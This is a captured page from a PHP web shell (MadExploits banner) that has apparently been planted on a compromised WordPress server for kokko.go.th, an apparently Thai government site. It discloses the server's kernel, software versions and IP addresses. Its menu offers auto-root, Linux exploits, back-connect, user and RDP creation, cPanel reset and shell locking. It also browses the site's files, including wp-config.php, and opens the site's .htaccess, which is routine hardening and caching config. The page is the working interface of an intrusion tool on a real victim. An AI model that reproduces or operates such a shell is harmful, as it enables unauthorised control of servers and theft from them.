Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.222.154.109
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
kokko.go.th /
[ HOME SHELL ]
Name
Size
Permission
Action
webboard-kokko
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
6.42
KB
-rwxrwxr-x
index.php
405
B
-rw-r--r--
license.txt
19.45
KB
-rw-r--r--
readme.html
7.24
KB
-rw-r--r--
robots.txt
103
B
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.16
KB
-rw-r--r--
wp-mail.php
8.34
KB
-rw-r--r--
wp-settings.php
28.35
KB
-rw-r--r--
wp-signup.php
33.58
KB
-rw-r--r--
wp-trackback.php
4.98
KB
-rw-r--r--
xmlrpc.php
3.17
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .htaccess
# /var/www/website2023/kokko.go.th/.htaccess # Begin Really Simple Security # ============================ Options -Indexes # ============================ # End Really Simple Security # ============================ # ====================================== # เปิดใช้ RewriteEngine + Force HTTPS # ====================================== RewriteEngine On RewriteCond %{HTTPS} off [OR] RewriteCond %{HTTP_HOST} ^www\. [NC] RewriteCond %{REQUEST_URI} !/wp-admin/admin-ajax.php [NC] # อนุญาตให้ Ajax ใช้งานได้ RewriteRule ^ https://kokko.go.th%{REQUEST_URI} [R=301,L] <IfModule mod_rewrite.c> RewriteEngine On # ---------------------------------------------------- # (1) บล็อก GPTBot, Bytespider, หรือบ็อตอื่น ๆ # ---------------------------------------------------- RewriteCond %{HTTP_USER_AGENT} GPTBot [NC,OR] RewriteCond %{HTTP_USER_AGENT} ByteSpider [NC] RewriteRule ^ - [F,L] # ---------------------------------------------------- # (2) บล็อกการเข้าถึง URL ที่มี query string 4 ค่า # ?eventDate=2023-04-14&eventDisplay=day&ical=1&post_type=tribe_events # ---------------------------------------------------- RewriteCond %{QUERY_STRING} eventDate=2023-04-14 [NC] RewriteCond %{QUERY_STRING} eventDisplay=day [NC] RewriteCond %{QUERY_STRING} ical=1 [NC] RewriteCond %{QUERY_STRING} post_type=tribe_events [NC] RewriteRule ^ - [F,L] </IfModule> # ====================================== # จำกัดขนาด Request Body # ====================================== <IfModule mod_headers.c> LimitRequestBody 52428800 </IfModule> # ====================================== # บล็อกไฟล์สำคัญ # ====================================== <FilesMatch "\.(htaccess|env|config|json|ini|log|sh)$"> Require all denied </FilesMatch> <FilesMatch "^[a-f0-9]{8}\.php$"> Require all denied </FilesMatch> <FilesMatch ".*/[a-f0-9]{8}\.css"> Require all denied </FilesMatch> <FilesMatch "\.ccss$"> Require all denied </FilesMatch> <Files "meta.json"> Require all granted </Files> # ====================================== # Compression (Gzip/Deflate) # ====================================== <IfModule mod_deflate.c> AddOutputFilterByType DEFLATE text/html text/plain text/xml text/css text/javascript application/javascript application/json </IfModule> # ====================================== # Cache-Control (แคชไฟล์) # ====================================== <IfModule mod_expires.c> ExpiresActive On ExpiresByType image/jpg "access 1 month" ExpiresByType image/jpeg "access 1 month" ExpiresByType image/png "access 1 month" ExpiresByType image/gif "access 1 month" ExpiresByType text/css "access 1 month" ExpiresByType text/javascript "access 1 month" ExpiresByType application/javascript "access 1 month" ExpiresByType application/font-woff2 "access 1 month" ExpiresByType text/html "access plus 30 minutes" </IfModule> <IfModule mod_headers.c> <FilesMatch "\.(ico|jpe?g|png|gif|svg|css|js|woff2?|ttf|eot|pdf)$"> Header set Cache-Control "max-age=2592000, public" </FilesMatch> <FilesMatch "\.html?$"> Header set Cache-Control "max-age=1800, public" </FilesMatch> Header unset ETag FileETag None </IfModule> # BEGIN WP Rocket v3.15.10 # ใช้ UTF-8 encoding สำหรับไฟล์ที่ต้องใช้ AddDefaultCharset UTF-8 <IfModule mod_mime.c> AddCharset UTF-8 .atom .css .js .json .rss .vtt .xml </IfModule> # FileETag None <IfModule mod_headers.c> Header unset ETag </IfModule> # ตั้งค่า Cache <IfModule mod_expires.c> ExpiresActive on ExpiresDefault "access plus 1 month" ExpiresByType text/html "access plus 0 seconds" ExpiresByType text/xml "access plus 0 seconds" ExpiresByType application/xml "access plus 0 seconds" ExpiresByType application/json "access plus 0 seconds" ExpiresByType application/rss+xml "access plus 1 hour" ExpiresByType application/atom+xml "access plus 1 hour" ExpiresByType image/x-icon "access plus 1 week" ExpiresByType image/gif "access plus 4 months" ExpiresByType image/png "access plus 4 months" ExpiresByType image/jpeg "access plus 4 months" ExpiresByType image/webp "access plus 4 months" ExpiresByType video/ogg "access plus 4 months" ExpiresByType audio/ogg "access plus 4 months" ExpiresByType video/mp4 "access plus 4 months" ExpiresByType video/webm "access plus 4 months" ExpiresByType image/avif "access plus 4 months" ExpiresByType image/avif-sequence "access plus 4 months" ExpiresByType font/ttf "access plus 4 months" ExpiresByType font/otf "access plus 4 months" ExpiresByType font/woff "access plus 4 months" ExpiresByType font/woff2 "access plus 4 months" ExpiresByType image/svg+xml "access plus 4 months" ExpiresByType application/vnd.ms-fontobject "access plus 1 month" ExpiresByType text/css "access plus 1 year" ExpiresByType application/javascript "access plus 1 year" </IfModule> # Gzip Compression <IfModule mod_deflate.c> SetOutputFilter DEFLATE <IfModule mod_setenvif.c> <IfModule mod_headers.c> SetEnvIfNoCase ^(Accept-Encoding|X-cept-Encoding|X{15}|~{15}|-{15})$ ^((gzip|deflate)\s*,?\s*)+|[X~-]{4,13}$ HAVE_Accept-Encoding RequestHeader append Accept-Encoding "gzip,deflate" env=HAVE_Accept-Encoding SetEnvIfNoCase Request_URI \.(?:gif|jpe?g|png|rar|zip|exe|flv|mov|wma|mp3|avi|swf|mp?g|mp4|webm|webp|pdf)$ no-gzip dont-vary </IfModule> </IfModule> <IfModule mod_filter.c> AddOutputFilterByType DEFLATE application/atom+xml \ application/javascript \ application/json \ application/rss+xml \ application/vnd.ms-fontobject \ application/x-font-ttf \ application/xhtml+xml \ application/xml \ font/opentype \ image/svg+xml \ image/x-icon \ text/css \ text/html \ text/plain \ text/x-component \ text/xml </IfModule> <IfModule mod_headers.c> Header append Vary: Accept-Encoding </IfModule> </IfModule> # END WP Rocket
Close